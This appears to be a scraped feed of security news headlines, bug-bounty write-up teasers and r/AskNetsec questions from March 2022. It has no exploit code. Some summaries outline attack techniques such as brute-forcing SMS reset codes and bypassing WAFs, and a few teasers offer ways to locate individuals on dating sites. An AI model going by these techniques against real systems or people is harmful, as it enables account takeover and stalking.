
    Burnout and me
    Please avoid it because it is preventable. Continue reading on Medium »
    Bug Bounty mission on Marsbase dOTC
    In connection with the release of the Marsbase dOTC platform, we are launching a Bug Bounty program to find bugs. This program provides that… Continue reading on Medium »
    Achieving Remote Code Execution via Unrestricted File Upload
    $whoami: Continue reading on Medium »
    SQL Injection at Spotify
    SQL Injection at Spotify. Continue reading on Medium »
    Story about more than 3.5 million PII leakage in Yahoo!!!
    Hello GUYS, Continue reading on Medium »
    How I Made The BBC Hall Of Fame 3 Times
    Happy Monday to anyone reading this write up. Today I am going to describe how I was able to make the BBC Hall Of Fame 3 times. My… Continue reading on Medium »
    My Pentest Log -10- (A Little Tip)
    Greetings to all from Khrysokeras, Continue reading on Medium »
    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    A simple story when Allah allowed me to get P1 by combining several issues, one of which was related to “weak credentials”. Continue reading on InfoSec Write-ups »
    How I access other domains in infinityfree.net using Directory Traversal
    Hi, it’s me again haha Kurt Russelle Marmol aka xkurtph, Web Developer (noobie) and Security Researcher. Continue reading on Medium »
  • Open

    registering with the same email address multiple times leads to account takeover
    Reddit disclosed a bug submitted by whitehacker18: https://hackerone.com/reports/785833
    User files is disclosed when someone called while the screen is locked
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1338781 - Bounty: $350
    Specially crafted message request crashes the webapp for users who view the message
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1253732 - Bounty: $150
  • Open

    Can an HTTPS Website be Hacked?
    It should be no shock by now that a professional can break through anything. These days, zero-days are a dime a dozen, so it’s important to ensure your site is hardened and protected as much as possible. While an SSL certificate can certainly be an important factor, it’s only one slice of the pie. In this article, we’ll be elaborating on the myths of SSL, the kinds of hacks that still have the potential to occur, and how you can improve an HTTPS site beyond installing an SSL certificate. Continue reading Can an HTTPS Website be Hacked? at Sucuri Blog.
  • Open

    Wanting to be Pentester
    Just finished high school and am wanting to be a Pentester. Got inspired by Mr. Robot, really. Got a little knowledge of Python and C; what are the ways to learn more and what should I take in college for it? submitted by /u/Small_Run9123 [link] [comments]
    is it too late for me to become a pentester
    Hello. I'm about to graduate college. I have some decent programming experience but no security experience. I can't do the most basic CTFs. If I get OSCP and some other certs, will that be enough to get a Jr pentesting job? Will that enable me to do some CTFs? I feel like I should have started when I was like 13. Is it too late for me? submitted by /u/Hellothere6667 [link] [comments]
    General advice needed for dealing with IPS alerts
    We have set up IPS monitoring on our firewall and I've been taking a look through the IPS events. Some are obvious on how to deal with, but some are harder, and I wondered if I could get some insight on what the process you guys would follow is for these? For example, one of our laptops on the remote VPN is triggering an IPS alert - 'TCP Segment Overwrite'. I google the text and I see that "This signature fires when one or more TCP segments in the same stream overwrite data from one or more segments located earlier in the stream. This may indicate an attempt to hide an attack." and also "Overwriting TCP segments does not normally occur and should be treated with suspicion". OK, sounds suspicious? So I run an AV scan, and the machine comes up clean. So where would I go from here? Disclaimer, I'm no "Mr Robot" lol. I can understand tcpdump in terms of tracing where a packet is going and which interface it goes in / out etc, but when it comes down to analysing packet contents etc with Wireshark, well..my abilities just don't stretch that far :( I always seem to hit this brick wall with a lot of IPS alerts where I'm just sat thinking, I don't know exactly what's causing it so I can't say whether it's a false positive or not. It's very frustrating! :/ Thanks for any advice you can give! submitted by /u/EffectiveClock [link] [comments]
    FOSS App Whitelisting Suggestions for Win 10 Home
    I'm running Windows 10 Home on a personal computer and am seeking a FOSS-alternative to AppLocker (AppLocker can only be managed on Windows 10 Enterprise, Education, etc.). Does anyone have any suggestions? submitted by /u/cyberphor [link] [comments]
    How to clean an infected USB
    Hi everyone, let's say I have a USB and I'm sure there is some kind of virus on it. What is the best way to clean and secure it so I can keep using it in future? submitted by /u/emir0723 [link] [comments]
    I'm losing hope
    In October I realized I hated my job and I decided to learn IT because I've always wanted to work in that field. I did CS50 to the end and I loved it. Since I couldn't decide in what domain of IT I wanted to pursue my learning path (because everything interests me in IT), I went into cyber security since it's pretty much the IT domain that includes all the IT domains. I did TryHackMe's Pre Security path and now I'm almost done with the Jr Pentester path. I'm planning to do the Blue Team path. I also do CTFs to practice along. At this point I suppose that if this field was not for me I would've known by now, but so far I love it. I want to become a Blue Teamer. Now I'm reading here and there on Reddit that it's impossible to start in cybersec for a beginner because you need real IT experience, for instance years as a software/network engineer. Back when I started learning, people told me that I just needed lab practice and certifications and then boom, I could apply for entry level jobs in cybersec. I wanted to get my foot in the door by starting as Help Desk and then as a Sys Admin; mastering the fundamentals is obviously mandatory, so I know I can't just start as a Blue Team Expert, but do I really need to be a network engineer for multiple years to then have enough XP to enter the cybersec (cybersex) field? Thank you for guiding me. TLDR: Is it mandatory to be an ex software/network engineer to then work in cyber security? submitted by /u/No-Lead497 [link] [comments]
    Converting .nessus files to CSV
    Hello AskNetsec, I have been performing CIS Benchmark scans and I am trying to find a good method for keeping track of audits while trying to remediate them. This is both for myself, our engineers and management. I have been struggling trying to find the right format to do this. I would like to convert .nessus files into CSV; I hope that will do the trick. Does anyone know a good method of converting from .nessus to CSV? If you have any other recommendations as to how to streamline this process, you are most welcome to comment. Thank you in advance! submitted by /u/Gabbana2
    About which cert should I pick
    My uni is providing a few certs under institutional training. The certs are: CompTIA A+, CompTIA Linux+, CompTIA Network+, CompTIA Server+, CompTIA Security+, VMWare Virtualization and Software Defined Network Concepts, Palo Alto Cloud Security Fundamentals, Palo Alto Security Operations Fundamentals. My goal is to become a penetration tester and I am currently a first year student. I had plans to get Security+ in 3rd year, but since our uni has partnered I am confused which of these certs is best for me so that these help me in the placement drive and so that I can focus on studying for OSCP from 2nd year. So basically, which cert should I choose? I am very grateful for your help!! submitted by /u/Otaku531
    Could Russia create a true “splinternet”?
    Guess one model would be North Korea, but something tells me that Russia would have a harder time based on geography and the population's current usage of the internet. submitted by /u/DryBloomer
    AWS/GitLab Self-Hosted CTF
    submitted by /u/RedTermSession
    Shodan: Introducing the InternetDB API
    submitted by /u/D4r1
    Making Sense Of The Dirty Pipe Vulnerability (CVE-2022-0847) - RedHunt Labs
    submitted by /u/redhuntlabs
    FirmWire is a full-system baseband firmware emulation platform
    submitted by /u/domenukk
    A Detailed Guide on httpx
    Introduction: httpx is a fast web application reconnaissance tool coded in Go by www.projectidscovery.io, with a plethora of modules effective in manipulating HTTP requests. The post A Detailed Guide on httpx appeared first on Hacking Articles.
    How Important is The Red Team in Cyber Security?
    A red team plays a crucial role in cyber security as they pose as “ethical hackers.” Continue reading on Medium »
    TRY HACK ME: Intro to C2 Write-Up
    Task 1 Introduction - Continue reading on Medium »
    Tonight at Midnight Presenting…
    If you pre-ordered, you know where I am going with this! Continue reading on Medium »
    SXSW 2022: Ti West’s X: Horror, Executed
    X is, indeed, gonna give it to ya Continue reading on Cinapse »
    A Beginner's Take on Data Security (Part 2)
    A brief discussion of data security institutional frameworks.
    FreeBuf Morning Report | Anonymous calls on Russians to "eliminate Putin"; One Piece broadcast halted by cyberattack
    Recently, Anonymous released a new message to Russian citizens, inviting them to join in "eliminating" President Putin, who is sacrificing them and killing Ukrainians.
    What is a HIPAA-compliant SSL digital certificate?
    With the widespread adoption of digitalization, SSL digital certificates have become an indispensable part of the network; protecting sensitive data communications and user privacy is more important than ever.
    The Regulations on the Online Protection of Minors (Draft for Comment) are open for public comment again
    The Regulations comprise seven chapters and 67 articles, and state that families, schools and other educational institutions should educate and guide minors to take part in activities beneficial to their physical and mental health, and prevent and intervene in minors' internet addiction.
    What if the website only has a login box? Six bypass scenarios for username/password reset
    When password recovery uses an SMS verification code with too few digits, or the code has no expiry time, an attacker can use automated tools to brute-force the SMS code within a certain time window and thereby reset any account's password.
    Beware: the Android banking trojan Escobar is lying in wait
    Escobar, a new version of the Aberebot malware, adds new features including stealing Google Authenticator multi-factor authentication codes.
    Ubisoft hit by cyberattack, causing temporary service disruption
    Rumours that Ubisoft had suffered a cyberattack circulated online, while the data-extortion group LAPSUS$ indicated this was no rumour: they had breached Ubisoft.
    TC260 publishes the 2022 List of National Cybersecurity Standard Requirements
    The list contains 34 standards in total: 20 to be drafted and 14 to be revised.
    Roundup: 12 risk-based authentication tools
    Risk-based authentication (RBA), also known as adaptive authentication, is a way to improve website account security without forcing users to use two-factor authentication (2FA).
    FreeBuf Morning Report | Google rolls out air-raid alert system to Ukrainian Android users; Ubisoft confirms cyberattack
    Google's official blog announced it is pushing an air-raid alert system to Ukrainian Android users. Google says millions of people rely on air-raid alert systems, and it is delivered via Play Services.
    SecWiki News 2022-03-14 Review
    [HTB] Ophiuchi Writeup by 0x584a; Watchdog or TeamTNT? A preliminary discussion of attack attribution by Avenger; SecWiki Weekly (Issue 419) by ourren. For more of the latest articles, visit SecWiki.
    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    SQLi: Next Level
    Shocker From Hackthebox
    Setup Armitage as a Command & Control (C2) Framework for Free
    UTCTF 2022 — Writeup
    Return-Oriented Programming on RISC-V — Part 1
    Offense/defense tricks: breaking through security protection via compatibility differences
    Author: Glassy. Original link: https://g1asssy.com/2022/03/11/fuzz/ Introduction: When a security protection product performs protection, it has to process the data in the traffic; likewise, the attacked application also has to process that data to keep the business running. In many cases, however, the framework the security product uses to process the data stream differs from the one the application uses. For ordinary data this of course causes no problems, but once the protected application's data-processing framework is more permissive than the security product's...
    Analysis of the reentrancy vulnerability in The idols NFT marketplace
    Author: Dig2. This article is a reader submission; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org Background: The idols is an NFT project on Ethereum; its distinguishing feature is that it distributes Lido staking rewards (funded by roughly 2250 ETH raised in the project's public sale) according to the number of idols NFTs a user holds. The project also issues the $VIRTUE token; users who buy and stake the token receive a share of idols NFT trading...
    How to Fact Check News
    Now, more than ever we are bombarded with news on and offline. Friends share stories or post them on their walls, but how do you tell what… Continue reading on Medium »
    Solution to some CTF challenges from https://investigator.cybersoc.wales
    A few months ago I participated in the CTF of https://investigator.cybersoc.wales/. Continue reading on Medium »
    Is there a way to see how someones API is formatted?
    I have the source files of the React app; it uses the Next.js framework. The .env file has process.env.NEXT_PUBLIC_API and process.env.NEXT_PUBLIC_API_TOKEN. I was able to get both values by using the inspect tool on the live page. They are:

        NEXT_PUBLIC_API=https://api.example.com
        NEXT_PUBLIC_API_TOKEN=thetokenstring

    The next.config.js file reads:

        module.exports = {
          webpack: (config, { isServer }) => {
            // Fixes npm packages that depend on `fs` module
            if (!isServer) {
              config.node = { fs: 'empty' }
            }
            return config
          }
        }

    I am trying to re-create the API so I can use my own in my app. When I use the inspect tool again on the live app and click the network tab, I can see the data the API is pulling in. It seems to be just in simple JSON formatting. When I enter the site through builtwith.com I can see some of it is hosted on AWS EC2 in addition to Vercel. In a .js file, the API is pulled in like:

        _getPairs = async () => {
          try {
            const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/pairs`, {
              method: 'get',
              headers: {
                'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`,
              }
            })
            const pairsCall = await response.json()
            return pairsCall.data
          } catch(ex) {
            console.log(ex)
            return []
          }
        }

    and

        updatePairsCall = async (account) => {
          try {
            const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/updatePairs`, {
              method: 'get',
              headers: {
                'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`,
              }
            })
            const pairsCall = await response.json()
            this.setStore({ pairs: pairsCall.data })
            await this._getPairInfo(account, pairsCall.data)
          } catch(ex) {
            console.log(ex)
          }
        }

    Is there an easy way to re-create this API? Am I totally off base? Thank you submitted by /u/tokentrader
    Mac photo library
    Can it be determined what device was responsible for uploading an image to the cloud in the photos.sqlite database — what info is available? submitted by /u/Complete-Cockroach80

    Solution to my $20 egg hunt (Part 1)
    Last week, I posted an article titled “There’s $20 hidden in this post”. Here’s how to solve the first part of it… Continue reading on Medium »
    The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems
    A detailed post on how I chained 3 vulnerabilities (A path traversal, An SSRF in an external piece of software, and a post-authentication… Continue reading on Medium »
    Open Redirect via Sendgrid Email Misconfiguration
    Hello developer , bug hunter and cyber security enthusiast. In this opportunity i wanna show you my first Bug Bounty writeup from one of a… Continue reading on System Weakness »
    Cybersecurity Bible: The 5 rules for every beginner.
    I have come a long way in cybersecurity. Here’s why I'm eligible for writing this, I have faced every problem, had sleepless nights, and… Continue reading on Medium »
    Reverse Engineering a Netgear NDay
    submitted by /u/lightgrains
    An automated setup for fuzzing Apache httpd w/ AFL++
    submitted by /u/pwntheplanet
    An automated setup for fuzzing Redis w/ AFL++
    submitted by /u/pwntheplanet
    Have I been Hacked or not????
    Have you ever thought you have been hacked? Or do you think your data’s secure in the digital world? We’re using many apps in our day to… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s good news, OSINT mobilizes for Ukraine, movement ecology achievements in AI, plus #Rstats tips for GIS and genomics Continue reading on Medium »
    SPY NEWS: 2022 — Week 10
    Summary of the espionage-related news stories for the Week 10 (7–12 March) of 2022. Continue reading on Medium »
    Questions about getting into DF
    Hi everybody. I'm sorry if this post goes against any rules or has been answered in depth somewhere else. I'm a 2nd year computer science major wondering about getting into DF, especially the LE side of things. Does anyone have resources or information about the general path to get a job in DF? Are there certain internships or work experience you can get while earning a degree that will help more than others? Are there specific certifications I should be looking to get in the future? Should I be pursuing a degree in DF, or would a degree in CS be a good base to work with? I don't think I have many classes that would transfer over besides some math/stats classes and a class on computer systems. I'm really just interested in seeing what the fastest path I can take from here to a job is, if I do end up pursuing DF. I really don't have any knowledge on DF or cybersecurity, but I made a TryHackMe account and I'll test the waters with some of the modules on there to see if I wanna really dive into this field. I've heard about SANS courses, seen some good online DF degrees from Champlain and other colleges, but I'm just not sure where to go from here. Thank you to anyone who takes the time to answer any of these questions! submitted by /u/Normijah625
    A Beginner's Take on Data Security (Part 1)
    A security beginner's general musings on data security
    Interpreting the 2021 Cyberspace Mapping Annual Report | Public cloud asset profiling and risk measurement
    Recently, NSFOCUS and China Telecom jointly released the 2021 Cyberspace Mapping Annual Report, which aims to use mapping methods to discover how assets in key areas such as IoT, public cloud, industrial control systems, security devices, databases and smart platforms are exposed on the public internet
    Interpreting the 2021 DDoS Attack Landscape Report | Threat-intelligence-based DDoS attack protection
    With the development of emerging digital industries such as 5G, cloud computing, big data and IoT, the scale of information infrastructure has grown accordingly, which inevitably leads to more and more network assets being exposed on the internet. Once these assets are exploited by DDoS attackers, they will pose a serious threat to network security
    How to use Katoolin3 to easily port all of Kali's programs to Debian and Ubuntu
    Helps researchers easily port the various tools in Kali Linux to Linux distributions such as Debian and Ubuntu.
    Russia to ban Instagram
    Russia's internet regulator Roskomnadzor will ban Instagram in Russia.
    An introduction to iptables & Netfilter
    An introduction to iptables & Netfilter
    SyntheticSun: a defense-in-depth security automation and monitoring framework that uses threat intelligence, machine learning, managed AWS security services and serverless technology to continuously prevent, detect and respond to threats
    SyntheticSun is a defense-in-depth security automation and monitoring framework that leverages threat intelligence, machine learning, managed AWS security services and serverless technologies to continuously prevent, detect and respond to threats.
    SecWiki News 2022-03-13 Review
    Linux System Security Hardening Guide by ourren. For more of the latest articles, visit SecWiki.
    Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)
    Article URL: https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 Comments URL: https://news.ycombinator.com/item?id=30661899 Points: 1 # Comments: 0
    Fuzzing with AFL – Part 2: Trying Smarter(Apache)
    Article URL: https://0xbigshaq.github.io/2022/03/12/fuzzing-smarter-part2 Comments URL: https://news.ycombinator.com/item?id=30661893 Points: 1 # Comments: 0
    scancss - Fastest tool to find XSS.
    Cross site scripting (XSS) vulnerability is very easy, popular and available on many websites. Continue reading on Medium »
    How secure is creditcard info on company servers nowadays?
    I'm reluctant to use credit cards when I can because I've seen a lot of stories of hacks into places like hotel servers where they get access to card details, customer name & address, etc. But most of these are from a few years ago; has there been any upgrade that minimized the risk of this happening nowadays? As in, is this info stored in a more secure way now? submitted by /u/computerstuffs
    Fuzz testing in the SDLC
    My company’s security org is curious about adding fuzz testing to our secure SDLC pipeline. I’ve been reading about the topic, which I’m finding fascinating, but it’s also left me with some questions about when to fuzz and which flavour of fuzzing would make sense for the large number of services/APIs in our portfolio.
    - At which phase does fuzzing get in the picture? Is this something typically run later, as in QA and deployment/release, or post-commit/build similar to SAST? Would the latter scenario be redundant given we run SAST?
    - How agile is black box and grey box (instrumentation guided) fuzzing for an app portfolio with a rapidly changing attack surface? I’m leaning towards black-box mutation and template fuzzers since the attack surface can be supplied via a network traffic capture, API specification… all of which are easily retrievable from other tools in our QAT/AST framework. My understanding is grey box fuzzers require user-programmed harness classes to interface with the app, meaning every time a new entry point is added or removed or a new app is onboarded, the fuzzer needs an updated setup. Afaik this setup is done manually, at least for all the open-source grey box fuzzers I’ve looked into.
    Any gotchas or recommendations on fuzz testing adoption strategy are much appreciated. submitted by /u/phuckphuckety
    Any thoughts on this course called HEXORCIST?
    Looking to see if anyone has any thoughts or opinions on this course for reverse engineering, or if they themselves have signed up for it. The course is found here: https://www.reverse-engineer.net/ submitted by /u/SufficientDistrict10
    Organizing vulnerability research?
    Hi all! I've been doing bits and pieces of vulnerability research on my own time, and typically I do it only so far as I feel "engaged" with the project. As you might imagine, this leads to dropping projects often and swapping between them, which looks horrible for career potential but also leads me to be constantly burnt out on research and other hobby projects. I am revisiting a very niche router OS with the intention to reverse engineer the firmware, such that I can understand its attack surface (and find bugs, eventually). This is a massive undertaking for me, but one that I believe is a good move, as doing so would demonstrate my ability to adapt and learn new things; the biggest problem, though, is me and my lack of organization. Thus, I'm wondering what tactics, techniques and procedures you all use when going about research. I'm no stranger to kanban boards and the like, and appreciate the idea of planning things out in weekly chunks, but is this advisable? submitted by /u/Mostly_Breadfruit
    Implementing Syscalls in Cobalt Strike Part 1 - Battling Imports and Dependencies
    submitted by /u/dmchell
    Korean and English Folder names, Movie names. stuff all over the place. (nsfw just in case)
    submitted by /u/thats_dumberst

    KB4288: CVE-2022-26500 | CVE-2022-26501
    submitted by /u/ghost-train
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files.
    submitted by /u/CoolerVoid
    Can anyone recommend a free remediation tracking software?
    App, web app, I don't care. I just need to keep track of things and organize them. Thanks submitted by /u/networkalchemy
    Tool for network visualization
    Is there any free script or tool to visualize network knots like here? https://miro.medium.com/max/600/1*D3DB7o6maH5BAxm5vWL4XA.png submitted by /u/dashlf92
    Open source Web application security scan tool
    Is there any good open source web application security scan tool you can recommend? We've developed a few web applications and look to build better protections. Thanks, submitted by /u/alphasystem
    State of the Subreddit #4
    Hello r/AskNetsec! It's been a while since we've last done one of these, and we hope that you all have been well. We, the moderators, wish you all well, and that everyone stays safe during these interesting times.
    Flair system! As you might have noticed, flairs have appeared. In order to organize the sub in a friendly manner, we have implemented a required flair system. The flairs:
    Analysis – Requesting aid to determine security/network-related issues. WITH DATA/Background
    Architecture – Questions related to best practices for environmentally based things. Product etc.
    Concepts – Questions around security concepts (IE Least Privileged, User Awareness, CIA Triad, Walled Garden, etc.)
    Threats – Questions related to specific threats in the security landscape.
    Compliance – Questions around compliance and legal standards (GDPR, NIST, PCI-DSS, etc.)
    Education – Further education questions, what certificates, degrees to go for, getting started in the field, etc.
    Work – Related to work questions. Burnout, salary, HR, etc.
    Other – Not fitting other categories.
    This is, of course, still a work in progress. Please feel free to comment on any suggestions you might have.
    I would like to reiterate that asking for help in committing a crime of any sort is not allowed. This is an immediate permanent ban.
    The sub has been growing well in the past few months, and we couldn't be more grateful for the support that has been given. We will see you all again in 3 months for the next State of the Subreddit.
    - AskNetSec Moderators submitted by /u/-Vampires-
    What model of ThinkPad should I buy for malware analysis?
    I am going to be starting community college as a cybersecurity major, and I am really interested in malware analysis. I heard that the ThinkPad is a pretty good laptop for that sort of thing, so I am looking into buying one pretty soon. I'm currently doing an internship and my boss told me that I should get a laptop that runs Hyper-V and VMs. He also told me that the P15 series is pretty good for malware, but I am not sure yet. What model of the ThinkPad should I get for this, and what specs do you suggest that I look for? submitted by /u/MadScientist876
    Asking for help on what steps need to be taken for data recovery on a wiped iPhone 6s 128g
    I recently received an iPhone 6s 128gb in for data recovery. I'm using this as an opportunity for learning, as I've never done recovery on an iPhone, so I came here to ask what steps I should take and what should be done for the best chance of data recovery. Please and thank you submitted by /u/23Weirdo23
    Prima facie
    Typically, how is prima facie established in digital forensics? Again, is user attribution important for prima facie, or is somebody owning equipment/controlling an account sufficient? submitted by /u/Complete-Cockroach80
    Geolocating Images — Tryhackme
    Geolocating Images Continue reading on Medium »
    Domain Escalation: Resource Based Constrained Delegation
    Introduction: Delegation has been a part of Microsoft’s Active Directory environment since the early 2000s and has remained one of few ignored threats by system The post Domain Escalation: Resource Based Constrained Delegation appeared first on Hacking Articles.
    A bug that made me $250
    Hey guys! I’m back with another write-up and this one’s about a bug for which I got awarded $250, so let’s start. Continue reading on Medium »
    Tactical Fuzzing — XSS
    XSS Continue reading on Medium »
    A Tale of Open Redirection to Stored XSS
    Hello guys, Continue reading on Medium »
    I have Found Microsoft Subdomain Website database list, database username, password
    Hello, Hackers 👋👋 Continue reading on Medium »
    XSS through base64 encoded JSON
    This is one of my very interesting and unexpected finding while testing an Application Tracking System. Continue reading on Medium »
    The Discovery and Exploitation of CVE-2022-25636
    Article URL: https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/ Comments URL: https://news.ycombinator.com/item?id=30653137 Points: 92 # Comments: 3
    SecWiki News 2022-03-12 Review
    Design ideas and a simple practice for security middleware by ourren; Building the OpenCTI threat intelligence platform by ourren; Artificial intelligence (AI) & cybersecurity by ourren; Security and beauty: my observations and reflections on cybersecurity by ourren; Practice and reflections on open-source component governance by ourren; AKG: Attacker Knowledge Graph by ourren. For more of the latest articles, visit SecWiki.
    Census Vulnerability Exposes 10k OAuth Tokens, Thousands of User Records
    Article URL: https://robertwillishacking.com/census-vulnerability-exposes-10k-oauth-tokens-thousands-of-user-records/ Comments URL: https://news.ycombinator.com/item?id=30652143 Points: 3 # Comments: 0
    Casper-fs LKM
    Casper-fs is a custom hidden Linux kernel module generator. Each module works in the file system to protect and hide secret files. This program has two principal functions: the first is making private files hidden; the second is to protect confidential files to prevent reading, writing and removal. https://github.com/CoolerVoid/casper-fs submitted by /u/CoolerVoid

    Insecure comparison in PHP — Business Logic Bypass vulnerability
    I have recently spotted an interesting vulnerability in a PHP application, which was in scope of a private bug bounty program. This… Continue reading on InfoSec Write-ups »
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    Hello everyone! Continue reading on Medium »
    Rate Limit Bypass at Readme.com
    Hey Community !! Continue reading on Medium »
    How I chained open-redirect to SSRF (Server Side Request Forgery)?
    So you are here. I have seen people reporting open-redirect without exploiting it for SSRF and being happy with low impact. You should… Continue reading on Medium »
    How I was able to takeover any users account on a major telecoms website
    Hello, today's write up is about multiple instances of the same vulnerability I found on a major African telecoms provider's website, we… Continue reading on Medium »
    FREE LABS TO TEST YOUR PENTEST/CTF SKILLS
    · Academy Hackaflag BR - https://hackaflag.com.br/ · Attack-Defense - https://attackdefense.com · Alert to win - https://alf.nu/alert1 ·… Continue reading on Medium »
    A bug bounty mistake…
    Sometimes if it looks like XSS, it may not actually be XSS. Continue reading on Medium »
    New Content!
    Hello! If you happen to find this page, all content has been moved and will be published to my new site going forward. Continue reading on Medium »
    TryHackMe | Red Team Fundamentals WriteUp
    This room is an introduction to red teaming Continue reading on Medium »
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows and new to the scene! Continue reading on InfoSec Write-ups »
    As an IT veteran, getting into Cybersecurity. What are my best next steps to move toward an IT/Cybersecurity Forensics career?
    Hello everyone. I will achieve my Security+ certification this year (mere months away). Currently, I have lots of IT experience, over 20 years of IT analyst, Helpdesk, and IT Desktop support, but I'm new to IT Security beyond what those roles entail. My question is: what should my next step(s) be to get a solid Cybersecurity Forensics career underway? I love remote (WFH) work and hope to one day have more of that, and less office time needed, but starting out, I'll do what I have to do. Do I need to study for a more advanced cert right away after getting the Security+? I know I need to work in a more entry-level IT Security-based job FIRST, get my feet wet obviously, prove I can do the basics, but beyond that, what should I be focusing on to move in the IT forensics direction? I really do appreciate any help, tips, play by plays, or just guidance in general. submitted by /u/cleverestx
    Google search warrant return question
    As you can tell by reading, I'm new to this. Thanks for any insights: Is it normal that some of the elements of a Google search warrant are formatted in HTML as a bunch of boxes containing information? I'm surprised that it wouldn't just be all in CSV or some other easy to parse/sort format. Under MyActivity, there's a document that lists browser/search activity (in boxes) that say "Visited Google Search" but none of these appear to contain any detail about what was searched. Am I not able to see what was actually searched? Is that something the user elected to keep private or is that standard reporting behavior of a Google return? Is folder-by-folder, file-by-file examination of these various HTML and CSV files the way most people approach looking through these things? Is there an obvious, better way? submitted by /u/PieWithIceCreamCrust
    SATCOM terminals under attack in Europe: a plausible analysis.
    submitted by /u/eberkut
    An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other Debian derivatives
    submitted by /u/albinowax
    LockBit 2.0 ransomware bugs and database recovery attempts
    submitted by /u/SCI_Rusher
    CVE-2022-24696 – Glance by Mirametrix Privilege Escalation
    When investigating my laptop, I stumbled upon something interesting that resulted in privilege escalation. I use a Lenovo ThinkPad X1 Extreme Gen 1, which has an installed software named Glance, for my day-to-day work. The purpose of this software is to use the advanced web camera to figure out if you are speaking when the... The post CVE-2022-24696 – Glance by Mirametrix Privilege Escalation appeared first on TrustedSec.
    What's the best free security scan tool for C/C++ files?
    My team needs to run a security analysis on an entire Github repo that includes mostly C/C++ files (a couple of non-C/C++ files are there too). What's the best free security scan tool that can be used to scan a repo in a Linux environment and scan all C/C++ files in the directories/subdirectories of the repo for bugs, vulnerabilities, code smells, etc.? submitted by /u/techsavvynerd91
    Are the type of "Flood" attacks really important?
    Hey folks, I'm learning about DDoS attacks, and I see a lot of ICMP floods, UDP floods, HTTP floods, etc. At the end of the day, the attacker sends Ethernet frames to the victim server and its network, so if we look only at how it affects the bandwidth of the server or network devices, there isn't any difference. In my point of view, it can only help to pass some obstacles. For example, the firewall blocks ICMP requests, but not HTTP, because those are legitimate requests for a web server like Amazon. Maybe the difference can be significant if we talk about exhausting CPU and RAM, because HTTP GET or POST can probably require the server to do a lot more than the ICMP protocol. Did I get it right, or did I totally mess something up? Thanks. submitted by /u/Webly99
    Car transmission hack
    I'm a target of hackers right now. They have hacked my car alarm to beep nonstop. Now for the first time yesterday my car was hacked to go from D to Neutral while driving. Any thoughts on how they did it? Don't tell me to get maintenance on my car, I'm a former mechanic and it's not a transmission problem... submitted by /u/Dogfish18
    Accessing home server from outside home - Possible methods without publicly opening access?
    Hello! I have a very basic homeserver connected to a router via LAN. I use it for Plex and nextcloud. I am pretty technologically adept, but I am not close to being adept at networking or security. I do take my privacy some what seriously and I'm assuming that simply portforwarding my Plex and Nextcloud instances to be able to access them outside of my house is dangerous. But I'm also in a position where I'm not informed enough to do something different. I can easily follow guides to do stuff and can troubleshoot. The homeserver runs Ubuntu. Are my doubts about portforwarding unfounded? If not, what other alternatives can I use to remotely access my homeserver and how would I go about installing them? I'm sorry if this is a very stupid question, as I said before, I'm not adept when it comes to networking and security.. Thanks in advance! submitted by /u/sadhgurukilledmywife [link] [comments]
    Tencent's VooV Meeting - Thoughts?
    It looks like my team is being cornered into installing VooV Meeting for some management meetings for various reasons. I've suggested using the web-based version, which hasn't seemed to work in their test meetings. I'm looking for some opinions on the use of this meeting software. I'm already planning to install it for the requested meeting, then immediately uninstall it afterwards. Considering further measures. Am I being paranoid? submitted by /u/unseenspecter [link] [comments]
  • Open

    CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
    IBM disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/938684
    Public Jenkins instance with /script enabled
    IBM disclosed a bug submitted by thesanjok: https://hackerone.com/reports/1492447
  • Open

    Yamagata XSS journey
    Hi readers! This write-up is about my yamagata XSS labs journey. There is a total of 19 stages in this lab. We have to execute the… Continue reading on Medium »
  • Open

    ‘We are not ready’: a cyber expert on US vulnerability to a Russian attack
    Article URL: https://www.theguardian.com/technology/2022/mar/10/us-russia-cyber-attack-prepared Comments URL: https://news.ycombinator.com/item?id=30642010 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-11 Review
Cybersecurity 2022: Guarding High Quality (PDF) by ourren. For more of the latest articles, visit SecWiki
  • Open

    [ Hack The Box ] Kryptic Ransomware - Writeup
    Europol EC3 is looking for clues that will lead to the arrest and prosecution of the Enigma Team leader. Continue reading on Medium »
    Managing your licenses in Lampyre
    If you have been following us on Medium for a while, you might have read our ‘OSINT 101 with Lampyre’ article, which is basically a good… Continue reading on Medium »
    OhSint Machine
    This is a walkthrough for the Osint Machine from TryHackMe . They just give us an image. Let’s open the image, we get the image of… Continue reading on Medium »
    How to find someone on OnlyFans?
    How to find someone on OnlyFans? We’ve been chatting to some experts in online investigations, what we found out was pretty useful. Continue reading on Medium »
    How to Find Someone on POF?
    Are you trying to find someone, that perhaps shouldn’t be on Plenty of Fish (POF)? Continue reading on Medium »
  • Open

    Introducing the mystery lab challenge
    For anyone who's used the Web Security Academy before, you'll be pretty familiar with the format. For those of you who haven't had the pleasure, the process goes a little bit like this: Select a set o
  • Open

OOB methods for detecting RCE despite system hardening
